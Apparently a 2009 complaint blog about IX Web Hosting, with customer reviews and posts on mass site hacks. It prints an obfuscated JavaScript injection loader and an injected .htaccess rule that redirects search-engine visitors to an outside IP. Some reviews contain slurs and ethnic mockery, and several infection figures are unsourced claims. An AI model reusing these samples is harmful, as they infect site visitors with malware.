I have tried many hosting companies and ixwebhosting is amongst the worst. Their server will go down frequently. We received so many complaints from our own customers that the website is not working. We get this just about everyday. And two days ago ixwebhosting.com servers were down for 4 hours. Yesterday it was down 3 hours. Today it is down now for over 2 hours and we are still waiting for the servers to work. We are hosted on NS13, NS14. This has got to be the most frustrating experience in our 9 years in ecommerce. We made the fatal error trusting to host our site with ixwebhosting.com. The first two months were okay but then after it went downhill. I think maybe they work really hard during the trial period so you cannot refund the month. I’m stuck now with a long period of webhosting plan. They won’t refund either and they will not provide you a good working server.
IX Web Hosting Reviews Jan. 2009
George , 30th 2009f January, 2009
If you are planning to run a serious website, DO NOT use Ix web hosting, they are more trouble than they are worth. Virus, Slow, Database problems, and Email issues.
Paolo, 23rd 2009f January, 2009
After reading the reviews about the servers / database’s slowing down at a certain time, I checked my log files, and it’s true, like clock work at 2 am every night they come to standsill intill 7.30 am then they pick up again. I posted a support ticket, after almost 24 hours I finally got a response telling me the ticket has been forwarded to support!!!!!… What is the point of that??.
I am looking into moving my sites to HostGator.
Gary, 22nd 2009f January, 2009
I am so sick and tired of ix web hosting!
I have had nothing but problems with them. Their support is useless, rude and they lie.
For the truth visit
http://ixwebhostwarning.wordpress.com/
Marky, 22nd 2009f January, 2009
Hacked, Injected, De-Faced, Slow, Useless Support and lots more.
IX is 100% USELESS!!
jack, 21st 2009f January, 2009
The server of ixwebhosting is down now. It has been on and off and stalling for the past month.. they keeps saying it was fixed but it isn’t. It’s very upsetting. We have had to complain and make complaints every day three times…. anyone know of a better hosting for Windows?
Melanov, 21st 2009f January, 2009
haha, i know how ixwebhosting is being attacked, I know who is behind the injecting. Over a year ago we contacted ix explaining they had problems, we had a very rude reply telling us it was lies, and the servers were secure. We added a folder with a fake website to at least 200 websites. Now ix wanted to listen, and even offered to pay per security issue.. but now it is too late.
ixwebhosting should listen when help is offered.
Gerald W, 21st 2009f January, 2009
I am in the process of moving my 12 sites from ix, I never had a problem with them for over 3 years, but as of November it has been one injection after the other. IX is not willing to help customers, instead they just want their money, and point the finger at customer once EVERY site on the servers are injected.
Don’t waste your time or money on these people.
Michael, 18th 2009f January, 2009
I completely agree with Blake, every night at midnight ALL my sites on two buisness accounts come to a screeching halt, everynight I call ix, and they appologize, and tell me they will find the cause and firewall the site, or even suspend the site(s) causing the slowdown, but this has been going on for weeks.
Also, I use “Mailwasher” that connects to my mailserver every 10 minutes, and every morning when I check mailwasher, I get an error log telling me that it could not connect to the server, with at least 20 times that it could not connect to the server.
It’s time to drop ix web hosting
AVOID
Blake, 17th 2009f January, 2009
I am totally and completely disgusted with IX Webhosting. It used to be a great host and I recommended it to everyone I could. But something has changed. I believe they got sold. Since then, we have had nothing but endless trouble with this host…
Last year, they proudly moved to a new Data Center. Of course this caused us problems for several months. They kept apologizing, but the problems persisted. After a very long period, things calmed down and remained that way until November…
Without prior warning, IX moved our site to a new server in November. After 60+ hours of calling, using Live Chat, and using the ticket support system, they finally worked out most problems. I felt like I had to beg to get IX to help resolve the problems that they created. I lost an entire weekend fighting them. The IX response times average between 12-24 hours…
Then again this January, IX updated all of our cgi-bin files in our domain and all of our sub-domains recreating the problems that were caused in November’s unnecessary server move. Again, it took over 60+ hours to get our site up and running. I had to find workarounds to get our site up and running, and amazingly, IX tried to take credit for getting our site up and running again even though they had nothing to do with it…
Even though our site is up and running now, we still have many problems. After 176 hours of fighting IX for help, they have yet to correct the Cron job errors that still plague our site…
The last two days, the server has crashed in the evening requiring another call to IX to get the server restarted/reset and our site back online. This was the same pattern that plagued us after the Data Center move last year. And early every morning, the page load response times drag down to a crawl. This seems to start between midnight and 4 AM every single night. The other day, the slowness continued well into the following day. We get an apology from IX each time this happens, but they don’t seem to be doing anything to permanently correct it…
IX has tried very hard to blame these problems on our code, which worked fine before the server move in November and again up until January. IX does not want to take responsibility for their actions and it is frustrating and disgusting dealing with them. I cannot in good conscience recommend IX Webhosting to anyone until they improve the skills of their own Technical Support staff. It wouldn’t hurt if they hired a few more knowledgeable people to improve their response times too. Waiting 12-24 hours for each new response to a ticket is totally unacceptable. With IX’s lack of effort, a resolution to a problem can drag on for days and weeks. IX does the bare minimum to assist its clients and they do it as slow as they possibly can…
Dealing with IX technical support gets real old real fast. I wouldn’t wish this on anyone…
Hans, 17th 2009f January, 2009
Do not believe their “Money Back Guarantee” After 3 weeks I requested a refund, and I only got about 30% of the full sum, they even charged me $20 for a .com, $20!!!, I can get these for $4.95.
Stay Away from these idiots
ett, 11th 2009f January, 2009
If IX is no 3 in the Top 10 companies list, what is the service level provided by those below on the list? Must be pretty terrible, eh?!
I have experience from IX as well as other hosts. Of the ones I’ve used, IX is the worst, one.com (in Denmark!!) has given me the best value for money.
Mike, 10th 2009f January, 2009
Bloody USELESS!
Muluut, 10th 2009f January, 2009
I am now just 3 months hosting with ix hosting and every day I having big problems. these people do not help and all my sites are hacked. I ask for backup and they tell me backups are no good, backups are hacked same as websites
ix hosting is no good for hosting.
Laurie, 10th 2009f January, 2009
With them for about 2-4 years. Was OK, nice customer service but innefficient now that I am ahving BIG problems – and now has been a nightmare since January 1st 2009. Now all my six websites are not even loading. Not even an error message! “server taking too long to respond” My site was hacked apparently (never happened in 10 years) and since then problems everyday. Even google has put a warning to visitors about malware from my site. My Google results have dropped completly Now have been pfflne for 24 hours. Disaster. Will change. I was told they are having problems with one of their servers. I don’t care. I’m changing. Will pay more for more.
Jonathan, 09th 2009f January, 2009
I too have been with IX for just under 4 years, and I too have pure html sites, I have 7 websites, I have always been very happy with IX, and up until September 2008 I had never had any issues. But since September my sites have been hacked, changed and re-directed on a weekly basis. IX keeps telling me about folder permissions and Ftp viruses, but I do not run any scripts, and do not have any folders, so I know that cannot be the cause. I will be moving all my sites to another host.
Archer Rejn, 09th 2009f January, 2009
I have been with IX for already 4 years and have never had any problems. May be cause I do not use any free php applications like wp or Joomla ? All my sites are html files with some Java scripts. I have never been hacked and all my sites load pretty fast.
Magix, 09th 2009f January, 2009
Don’t waste your time or money on these people. 100% USELESS!
kjett, 09th 2009f January, 2009
There is at least one positive aspect of using IX, viz. you learn a lot about the perils of using a web host without sufficient technical knowledge and/or security routines.
You learn that you yourself have to take responsibility for implementation of all the precautions needed, such as recurrently (frequently) making sure your hosted domains haven’t been hacked, having all directories properly chmod-ed and .htaccess-ed, and keeping updated backups on a local server.
These security routines will prove to be useful when you move to a hopefully more competent and secure web host.
beyaz, 06th 2009f January, 2009
have the same problem!!!! they are just after money instead of clearing their s**t!
George W Bush, 05th 2009f January, 2009
Don’t waste your time with these people, they are just a bunch of incompetent retards.
Sammy J, 05th 2009f January, 2009
4 days ago my 6 sites were injected with code, I spent 2 full days cleaning my sites, ix wanted to charge me $80 and hour to clean them, today all 6 sites are injected yet again.. I’m moving to another host, People, beware of IX they do not give a damn about your sites, all they want is your money.
Anita, 03rd 2009f January, 2009
Add me to the list of customers that have been affected by ix’s .htaccess vunerability, and yes they are blaming me, the best part is, they are willing to fix this for me for $80 !!
Roger no Kids, 02nd 2009f January, 2009
@ Roger Kids..
You TWAT!!..
People don’t like IX because they HAVE tried them!!.. If you haven’t tried them, how is a person suposed to know if they like them or not?..
All a person can expect, is what they are promised and what they pay for.. NO MATTER what the price is.
IX are RIP OFF’S they promise, take your money and accuse you for their incompetance.
Roger Kids, 01st 2009f January, 2009
Cmon` guys. If you don`t like IX why you choose it? Try to spin around for hosting which is better and cheaper. Let`s see what u`ll get
IX Web Hosting’s PHP Upgrade Notification
Dear Nicole **********,
We are happy to inform you that over the next two weeks we will upgrade PHP to the latest 4.x version (4.4.9) on the web server your website is currently being hosted on. This upgrade will resolve many security exploits and make services more stable.
As part of this upgrade, we will migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. Once implemented, you will have the ability to upload your very own php.ini file into your cgi-bin folder as needed.
After the upgrade, your website may experience a few errors, all of which can be quickly resolved. Most are caused by having PHP directives inside an .htaccess file.
To fix this problem, simply login to your control panel and click on the WebShell icon. The .htaccess file will not be viewable unless you have “show hidden files” checked in your WebShell settings. Open the .htaccess file and remove any lines that start with “php_”. If you need to retain these settings, then they must now go into a php.ini file and placed into your cgi-bin folder.
If you are running PHP in any of your HTM/HTML files, please add this line to your .htaccess file:
AddHandler php-script .php .php3 .php4 .htm .html .phtml
If you have any questions or concerns about this upgrade, please do not hesitate to contact us 24/7 via live chat, ticket, or phone support and we will be glad to assist.
I hope you will enjoy the new features and increased security!
Best Regards,
Fatima Said, CCO
IX Web Hosting
IX Web Hosting making money from their INSECURE SERVERS
For going on 10 months now ix web hosting’s servers have been under attack, both the older php4 and the new php5 are full of security issues, and have been seeded and are constantly injected with various scripts and / or the .htaccess file gets renamed and customer sites are re-directed.
MORE than 120.000 IX hosted sites are injected / .htaccess hacked on a weekly basis, an excellent oppertunity for the scum IX to make a quick buck!!
IX Web Hosting will clear up the mess that is caused by their extreme Incompetence and INSECURE SERVERS for just $80 AN HOUR!!
A few days ago I was contacted by an IX customer that hosted 5 html sites ( not a single script) all 5 websites were injected with the Yahoo Counter Script, this was the 3rd time in one month that this had happened, each time she just re-uploaded all her sites, but still her sites got injected. The 4th time she approached IX to help her get her sites back in order. IX charged her $160 ( 2 hours) to get her sites back to normal. 6 DAYS later all her sites were injected, but luckily the bastards at IX were willing to help her again for another $80 an hour.
Is YOUR site INFECTED by the Yahoo Counter or .htaccess
A lot of people are contacting me, asking HOW you would know if your site is infected?.
Let me start by saying that in some cases you will know immidiately when somthing is wrong, but in other cases it might not be too clear.
The YAHOO COUNTER SCRIPT
Click Image to Enlarge
is an iFrame Javascript injection that injects code into the Footer, Body, or Header, or all three at once.
Thousands of IX web Hosting customers are infected with this code, and they do not even know it! The web Page looks normal, but this can be very dangerous, your website will eventually drop from ALL the mayor search engines, and your domain will be flagged as “Dangerous Malware” by all the search engines.
To check if you have the Yahoo Counter injected, visit any search engine, and visit your site, If your site loads as it should, BUT it still shows “Loading” in the taskbar for some time, and then in most cases ( but not always) an ” Acrobat Reader” Error message will pop up.
Now you must Check the “Source Code” ( Menu Bar –> View –> Source ) and you will notice the Code that has been injected.
The .htaccess Injection
This is a very sneaky Injection, the reason being, is because most people that have and check their websites, access them by either a shortcut, or directly through the search bar by using the url, In both these cases, your website will be perfectly normal, BUT, anyone trying to access your website through any of the mayor Search Engines, will be re-directed.
Click Images to Enlarge
Once that is done, a FAKE ANTI VIRUS will pop up, and start scanning your PC, it will then alert you that you have dangerous files on your PC, and if they should be removed, if you click YES, you are screwed!!, a Trojan with KeyLogger will be executed on your PC, and you are INFECTED!!…
Anyone who has the FAKE ANTI VIRUS pop up, should just click off the site NEVER click “Yes” or “No”.. just click OFF the page , if your PC freezes, use “Ctrl-Alt-Delete” and Stop the process… then out of precaution you can “Delete” your cached internet files.
An example of the injected .htaccess file.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* h**p://87.248.180.89/topic.html?s=s [R,L] ( link altered by ME )
Remember, you only get re-directed if you click on your url from a search engine
IX Web Hostings Servers using both Php4 and Php5 INFECTED
As I wrote yesterday, MORE THAN ONE THIRD OF ALL IX Web Hosting’s hosted sites are INFECTED.
And to make things worse, the problem is spreading.
Up until Jan. 3rd 2009 it was only the older servers still running Php4 that were being affected, but now even the NEW server blocks, running Php5 are being injected.
IX Customers with sites on the server block with mysql address mysql501.ixwebhosting.com that runs php5. are being injected.
This is bad enough, and the fact that after 9 MONTHS!!! IX Web Hosting has still NOT GOT A CLUE how this is being done is a complete DISGRACE!!
And to add salt to the wounds, IX is not just being attacked with one form of iFrame injection, NO, IX is being attacked THREE different ways.
1) The notorious ” YAHOO COUNTER” is being injected into the FOOTER of every file.
2) The .htacces File that is overwriting and / or adding an . htaccess file into the root of every site and re-directing sites
3) As of Jan. 3rd 2009, a SECOND but modified version of the ” YAHOO COUNTER ” iFrame injection is now being injected into BOTH the Header, AND / OR Body of every file.
Today an IX Web Hosting customer sent me a link to their site, that was injected with THREE Yahoo Counters, Header, Body and Footer.
The owner of the site told me that the site would take ages to load, and would often even timeout, and Google had dropped the site completely from the Search Engine, penalized because of the “Malware Script”
Here is a quote from IX Support’s Alex Karamushko :
We have currently problem with Yahoo counter hack, but our system administrators and security analysts working hard for finding exact reason of that problem and we can assure you that this will be fixed shortly.
After 9 months, I ask myself what ” shortly” actually means?!.. Another week?, month?, or maybe 3 months?.. because I was told by “AGENT IX” that at the rate things are going now, by May 2009 EVERY website hosted at IX will be infected by these injections.
Chinaman Calls – IX Web Hosting
IX Customer Calls IX … Funny to say the least.
http://www.youtube.com/watch?v=xU0a-1Zt3nU
And someone else calls as well.
IX Web Hosted sites Hacked & Defaced Jan 9th 2009
More than ONE THIRD of ALL IX Web Hosting sites INFECTED
A lot of the information I post here, I get from a person that works for IX Web Hosting and / or Ecommerce, as you all understand I cannot give any details that could compromise his / her position. I will call this person “AGENT IX”
Today I recieved an Email from “AGENT IX” that states that more than 100,000 IX Web Hosting Sites are infected.
The Details are, that IX Web Hosting is hosting 285,223 websites ( source http://whois.domaintools.com/ixwebhosting.com
More than 100,000 sites are infected, which means that more than 1/3 of all IX Web Hosting sites are infected!!
and IX has still not got a clue how to stop these attacks.
Also the injected script(s) are changing ( see previous posts) which most likely means that this vulnerability is now being exploited by various people / groups, and this also means that this problem is going to get a lot worse before it gets better, this problem has now been effecting sites since last year May ( 2008 ) almost 9 MONTHS LATER the problem is worse than it has ever been, and there is no bright light at the end of the tunnel yet.
A NEW wave of iFrame Injections for IX Web Hosts Customers
It has come to my attention that a NEW wave of iFrame injections has infected 1000’s of new IX Web Host Customers, unlike the previous injection, that injected javascript into the footer of every file, this new piece of code is being injected into the “Header” of every file..
The new code looks like this:
<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,
15,60,5,50, 47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL
58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KD gOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM
@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>
Manager Kenny at IX Web Hosting informed a customer today ( Mon 5th Jan.) that they were testing right now and should be completed in a week or two…
ONE OR TWO WEEKS!!!.. Hey we have been waiting for 8 MONTHS!!!! You would think that by the advice is giving all their paying customers, and blaming them for everything, and then offering to fix the problem for $80 AN HOUR!!.. that they would know how to fix this problem, but is is clear they do not, and instead of putting more time and effort into solving this, what does IX do??… TRY AND MAKE MONEY FROM THE PROBLEM!!!… Thats correct, IX Web Hosting is offering to fix / clean customer sites for $80 an hour!!… This is an absolute disgrace!!
To me it is clear that a large group of people know the vulnerability at IX servers, and various people are now injecting their own script, thats why we are starting to see various different scripts appearing.
IX Web Hosted Sites Hacked and Defaced Jan. 2nd 2009
- http://forums.spartiate-peers.com/
- http://www.washrag.org/phpBB2/index.php
- http://www.pococks.net
- http://imprecator.net/
- http://imprecator.net/
- http://www.capetowntips.com/
- http://countrydataservices.com/
- http://releasespy.com/forum/viewforum.php?f=13
- http://nickersonpianostudio.com/
- http://strangeauction.com/
- http://temp.simplyenticing.com/
- http://vavize.com/
- http://utilizesports.com/
- http://www.commandoes.us/
- http://www.neostudios.co.uk/lucypinder/
- http://tommygallagherband.com/index.php?option=com_gigcal&Itemid=30
- http://thatsmydiary.info/
- http://greenlaser.cn/
- http://www.elfankosh.com/admin.php
- http://ircai.com/
Response from Ecommerce about Backups
XXI. Data Integrity
The subscriber is responsible for keeping a complete and current copy of their website files as a backup on a remote system (not solely on IX Web Hosting servers).
IX Web Hosting is NOT RESPONSIBLE for any lost files, information or data.
IX Web Hosting makes regular internal backups of internal system configurations and databases. These backups are NOT intended for keeping backups of subscriber websites.
Although IX Web Hosting backups may include subscriber sites and information for disaster recovery purposes, these backups are not to be relied on by the subscriber. IX Web Hosting does not guarantee to possess the most current copy of a subscriber’s website in its own backups.
https://www.ixwebhosting.com/index.php/v2/pages.tos#q21
Best regards,
Technical Agent, CR
CR Department
Ecommerce.com
Alex Golovko
===================================
My response
Yes Alex, we ALL know that IX Web Hosting is not responsible for anything!!.. Paying customers are responsible for EVERYTHING … You clearly promise daily backups , and on the other hand you clearly state that it is the customers responsability
May I ask what the Backups are intended for, if they are ( and I quote) NOT intended for keeping backups of subscriber websites
And while I’m quoting, here is another one:
IX Web Hosting does not guarentee to posses the most current copy of a subscribers website in it’s own backups
Maybe this is true, but they do quarentee, or should I say promise, (and another quote)
10. What kind of backup policies do you have in place?
We perform daily on-site backup via our own custom-made backup solution.
Can be seen:
https://www.ixwebhosting.com/index.php/v2/pages.faq_policies#q610
And in my books, a “Day Old” backup is pretty recent, but with the insecure and vunerable servers at IX, a Day Old Backup is as useful as a splinter in the eye.
And my last quote on this subject: IX Web Hosting is NOT RESPONSIBLE for any lost files, information or data.
18 months ago, IX webhosting lost my whole site, incl. database.. How they actually did it, I do not know, they compensated me with a FREE WEEK of hosting!!!.. haha, thats like pulling out my last tooth!!
I had backups of the site, but just like said the lame pathetic IX is NEVER RESPOSIBLE!!.. It’s always the paying Customer!!
IX webhosting Backups
Since I started this blog I have recieved way too many Emails from IX customers that are being blamed for IX web hosting’s incompetence, so far I have 1374 emails from people that are furious at the way IX is treating them and their buisness. In the past week I have recieved 41 emails from customers that have completely lost their website(s) Not due to any injected scripts or iFrame hacks, but because IX webhosting has deleted them, and do not have any backups..
An example recieved today.
Dear Larry Sypher,
I am very sorry for this recent inconvenience, please accept my sincere apologies. Our admins have verified that all relevant backups have been rotated already. Unfortunately all backups which are older than a week are being deleted from the server on a regular basis because we cannot afford to store too old backups due to the many system restrictions of the shared hosting environment. It is much recommended to create local backup copies. I regret.
Best regards,
Technical Agent, CR
CR Department
Ecommerce.com
Alex Golovko
So what they are saying, is that if anything was to happen to your site, you have LESS than a week to discover it, and have it backed up, otherwise, a new backup will be made, and this time it will be the “INFECTED” site, and you have just lost your site!!.. ONE WEEK!!?? …. It takes IX 4 days to reply to a support ticket!!
This evening 01-01-2009 I checked to see what support has to say about backups..
So, they are telling me they have a choice of 4 Backups, over a 2 week periode
Well, we all know IX webhosting are a bunch of liars, this is just another example of how they they promise you things, but cannot deliver
IX Web hosting Reviews Dec. 2008
| Seve, 29th 2009f December, 2008 |
| Ooohh alright, I’ll GIVE them away!!Still no takers?..
Don’t blame ya!! |
| Steve, 29th 2009f December, 2008 |
| Anyone want to buy my 2 buisness Accounts I have with IX ? I’ll sell them for a good price.. IX is the leader in quality Web Hosting, and comes with top notch support.. especially if you speak Ukrainian.. C’mon be part of history, IX might not be around for much longer. |
| Rich, 29th 2009f December, 2008 |
| IX is so full of shit, I can smell them fro here. These dickwads are clueless, they are a laughing stock. Anyone hosting their sites with these people need to seriously start looking for another host. IX is gonna get a hell of a lot worse before it gets better.. thats if they survive the loss of so many customers. |
| James, 29th 2009f December, 2008 |
| 6 weeks ago I purchased an account with ix webhosting, in this 6 week periode my site has been cleaned and re uploaded 14 times!! every other day it gets injected with a .htaccess file, and gets redirected. I do not have any scripts for my site an no .htaccess file. ix has constantly blamed me for this. Luckily I only have one site, I’m counting my loss and moving away. |
| Bart de Vries, 29th 2009f December, 2008 |
| A complete bunch of ignorent stuck up turds!!.. couldn’t run a stopwatch, let alone a hosting company. |
| Oz, 29th 2009f December, 2008 |
| IXWEBHOSTING is bent!I mean all my domains had a .htaccess file which redirected all search engine traffic to another website (located at starnet.md) to download malacious files (virus).
This is the contents of the .htaccess file: RewriteEngine On It’s rewriting code to direct all users from Search engines away from my websites. Good bye IX! |
| Juloep, 28th 2008f December, 2008 |
| I just read this website and here you can see that ix people are thiefes
http://ixwebhostwarning.wordpress.com/ |
| Juloep, 28th 2008f December, 2008 |
| I have holiday for 6 days, and when I get home my website has gone, instead a page tells everyone my web site is terminated.. I call ix and they tell me my site was phishing site.. I tell them that it is a mistake, my website is about hotel in Tunisia.. I ask for them to please put my website back because people think I am now a thief but they say i must buy a new account. these people are VERY bad people, they make me look like thief but they are thief!! |
| Eddie, 28th 2008f December, 2008 |
| www.psedog.com Another website screwed by IX. Luckily I was nearing the end of my contract when they decided to suspend my account for “Phishing” All the suspected folders had permissions of “httpd”. A week prior to IX shutting my site down (Suspended). They had informed me that my site had been “hacked” and had a virus in it. They claimed to have fixed it. Only to shut down my site shortly after. Look at some of the recent comments under mine and you will see that I’m not the only one. IXWebHosting is crap. I only dealt with it for as long as I did because I had already paid. Unfortunately I didn’t have the site as a whole backed up. Now I have to go and rebuild it again from multiple sources.They shut my site down 2 other times before. They claimed TOS for copyright infringement. The infringing products were my own pictures from my car club in Souther California. Apparently I’m not allowed to have a nice car and know others that do as well. (G35Driver) |
| Jack Brown, IT Director, 26th 2008f December, 2008 |
| The best hosting company list at: Mavaron.com http://www.mavaron.com |
| John M, 26th 2008f December, 2008 |
| I am so pissed off with ixwebhosting, they know they have an issue with their servers, but they still blame the customers. I have 2 static sites, and they have been injected nad the files permission changed to httpd. When I phoned support I was blamed for in-secure folder permissions, when I told them I did not have any folders, they told me to purchase an anti virus software, and scan my pc!! I told them My McAfee AV is 2 months old and up to date, and scans every Tuesday and Friday.. Then they told me to TRY ANOTHER Anti Virus software Keep away from these idiots |
| Tom, 25th 2008f December, 2008 |
| Today without warning ix web shutdown my account, because I ran a script on it, I have a photography site for newly weds, I know nothing of any script. They are rude and are blaming me for their problems. How can I get my database and all my files? Can I sue them? |
| Jacque, 25th 2008f December, 2008 |
| Once they were a very good company, but now they are the worst, and the worst just keeps getting worse. Avoid ix web hosting until they get their act together. more info http://ixwebhostwarning.wordpress.com/ |
| Babs, 25th 2008f December, 2008 |
| What a nightmare!! Talk about crooks, it is beyond me that IX is still in buisness. I would not host my site with them for FREE Been there.. done it… got the stress |
| 2 matt, 25th 2008f December, 2008 |
| Hi there, go on www.dickgreasley.com to check how fast the server is. On bottom of the website is link to EBH. |
| matt, 18th 2008f December, 2008 |
| ixwebhosting.com server has been down for now 3 hours. My company cannot retreive important data. I think this company is so damn unprofessional. If anyone has any other suggestions for other good webhosting companies, please do let me know! |
| cashzzz, 18th 2008f December, 2008 |
| Server has been down now for over 2 hours….ixwebhosting keeps telling us to wait 15-30 more minutes… we cannot keep waiting like this. They said the server is under maintenance, but the server should not be down like this for more than 2 hours.. not sure how much longer… |
| cashzzz, 18th 2008f December, 2008 |
| Server is down as of now. for over 1 hour 30 minutes… we are told the server will be up another 30 minutes but that was 30 minutes ago. |
| Chris, 17th 2008f December, 2008 |
| It was a nightmare dealing with these horrendous people at IX Webhosting.- For the seven months my site was hosted there, there were a lot of slow downs, database cut-offs and data lost, and they never provide any compensation or explanation of why that happened
- IX reserves the right to cut off your website at anytime whenever they feel like to. At first they would not tell you they are going to cut you off, they just asked you to accept their TOS terms of service. Once you did that they cut you off immediately. - Worst of all, they do not allow user to download their own website or database once they suspended your account. If you are not prepared you will be totally screwed. I have never seen hosting company not providing user their database when they move out of the host. - Technical support is horrendous, either the person there just try to play dumb or are complete idiots. They do not listen to your words, they just repeat themselves over and over again as if they are merely answering machines. - Make sure you read every single word in their terms of service, there are a lot of unfair terms to the user, make sure you are alright with every single term in there before you sign up. These guys sure know how to make a fool of you by playing with the terms. |
| they are bad, 16th 2008f December, 2008 |
| Koima They are pretty bad , but have you checked out IPower.For years of consistant appalling service, i doubt you’d get any worse – anywhere . Why nearly all of the top 10 listed here are still in business is beyond me – most (not all) of them are not worth counting anywhere in the top 1000! |
| Koima, 12th 2008f December, 2008 |
| WOW, I never see so many bad comments I think I will never use ixwebhosting |
| fuckIX, 12th 2008f December, 2008 |
| ixwebhosting can kiss my arse. 2 years of these pathetic people is enough. IX does not give a damn shit about customers, they take your money and screw you BURN IX BURN!!! |
| David Lee, 11th 2008f December, 2008 |
| My htaccess file was replaced and my website was down yestoday. It seems like nothing they gonna do to make their hosting service to be the one it should be. I have to upload htaccess every 4 days. ixwebhosting is a shit! I want my money back! |
| Sandra, 11th 2008f December, 2008 |
| I am so glad that I only have 2 web sites with these crooks. I wish I had found this site before. I purchased my account 7 weeks ago, and since then I have had nothing but trouble, in those 7 weeks I have had to upload backups 11 times!! I tried to use their support 3 times, but each time all they said was I needed to create a ticket.. Bottom line, AVOID IX web hosting |
| Harry, 09th 2008f December, 2008 |
| IX wehosting is a 100% rip off, I cannot understand that they are still allowed to sell hosting. My sites are hacked on a weekly basis. Support are a bunch of ignorant retards that belong in a Zoo cleaning up the animal shit!! IX web hosting, Please do yourself a favor, and pull the plug!! You are without doubt a disgrace to the hosting world. |
| J C, 01st 2008f December, 2008 |
| Our websites has been Hacked again We were connected with IXWebHosting Now we have enough and cancelled our multiple accounts with them |
IX Web hosting Reviews Oct. + Nov.
| KB, 30th 2008f November, 2008 |
| I’m having the same issues… files that were owned by my account became owned by httpd and all had virus injected into them.
I have a shell script that runs a ls -l every 6 hours and compared the results from the last run 6 hours previous and it caught a mountain of changes on the morning of Nov 27th at 8:20am (their server time). Submitted a ticket and they said my site was internally hacked. Tried to reply to the ticket and the reply buttons aren’t even working. Submitted a new ticket to reply to the old ticket to ask how file ownerships can change like that. Awaiting a reply. |
| empusa, 21st 2008f November, 2008 |
| When I signed up two years ago, they seemed pretty good. However, over the last tow years their service has got worse and worse. In the last week before I transferred all of my sites and my clients sites to another host, all of my sites went down for over 24 hours on three separate occasions. Every time I entered a support ticket, it took them over 10 hours to reply, only to ask for ‘further information’. They claim to be in the USA, but every reply is from an Eastern European name. Their so called ‘live support’ is a joke, each reply takes over 15 minutes and they always end up saying that I should submit a support ticket. My sites were hacked constantly. Other users on the same server could access my files and folders even despite being chmod 755. You get what you pay for. I’ve just moved to A2hosting. I’ll have to pay twice as much but the service is infinitely better. |
| Yunus Member, 19th 2008f November, 2008 |
| Shit Service. Dont ever use them had a lot of problem they are stupids and idots and bloody liars |
| de P, 14th 2008f November, 2008 |
| Since May of 2008 24 of my sites ( 3 buisness Accounts) have been mass injected, 8 sites have had the .htaccess file injected thus redirecting the sites, and 5 sites have been used a Phishing sites for among others “Wells Fargo” and Washington Mutual”. I am not going to advise anyone if they should or should not use IX webhosting, just google “IX webhosting Hacked” and make up your own mind. There is not a single server that is 100% safe / secure, That IX was hacked, is no big deal, it can happen to anyone, but being hacked MORE than 7 time within a year, and having a support team that are COMPLETELY useless, and for months have TRIED to blame customers for 777 permissions, I had one account with ONLY 5 html sites , NO folders, NO scripts, NO permission, and they ALL got injected. |
| Christos , 12th 2008f November, 2008 |
| I regret the time I signed with Ixwebhosting. The site is on a regular basis down… and most of the times the initial contact is VERY VERY slow… and you receive connection interruptions all the time….. I am looking for another provider ASAP. What a waste of time and money |
| sony, 01st 2008f November, 2008 |
| They make me crazyyyyyyyyyyy, the server is more down as up, no matter what day time I check my sites, I see just the error network timed out,The operation timed out when attempting to contact …. The requested site did not respond to a connection request and the browser has stopped waiting for a reply. The only positive on ixwebhosting is, they are cheap, low price = low quality, so definitely not recomended for commercial/business websites, your business will not grow with ixwebhosting. |
| Bob, 28th 2008f October, 2008 |
| Wow – wish I’d read this first. I signed up and was soooo excited by their unlimited everything and their “DotNetNuke Expertise”. Wrong. They have no tools for DNN (can’t backup & restore your DB via SQL Server Mgr. as I was told when I called BEFORE signing up) and their techs are CLUELESS about DNN — actually worse, some seem to know it exists and others don’t. The biggest reason to avoid them is I had an open ‘ticket’ for over 12 hours. I’ve read where people say to use ‘chat’ and they’re right — you get a quick response from someone (some person who I’m sure is in Ohio or somewhere in the USA but whose name is achmed zahermche or some other “wanna buy a vowel” name)l but I would rather type an explanation of a problem clearly in an email or text box than try to type in real-time with someone to whom English is a 2nd or 3rd language. If you really want to know how bad ixwebhosting is, I came over from WebHost4Life — the gold standard for BAD hosting and support and these guys are as bad or worse (for my needs). Stay away. |
| David, 23rd 2008f October, 2008 |
| I had trouble accessing my site at least twice a week with IX. The SPAM was a serious problem. I canceled my account 6 months into the 24 months I had paid for. They refunded less than 25% of my money claiming that that their terms required that because I canceled, even for poor service, I now must pay for set-up fees and domain name registration that are FREE when you sign up. Horrible, rude, employees. MANY complaints to the BBB.
The worst thing, though, was that they disabled my account and I had to get the Attorney General for the State of Kentucky to order them to return control of my domain name to me. |
| support, 21st 2008f October, 2008 |
| try www.hostmysite.com |
| Shrink, 21st 2008f October, 2008 |
| They re-activated my account. I am backing up files now. I’ve got one more strike. If I’m hacked again, I’m gone. I’m gone anyway. Looking for another host. |
| Shrink, 21st 2008f October, 2008 |
| I have not had many problems with IXwebhosting until yesterday. I too was hit with TOS violations because someone hacked my site and uploaded phishing files. IX will blame you for the problem. Then, without warning, they suspend my account with no access to the files for the 8 domains that I have! |
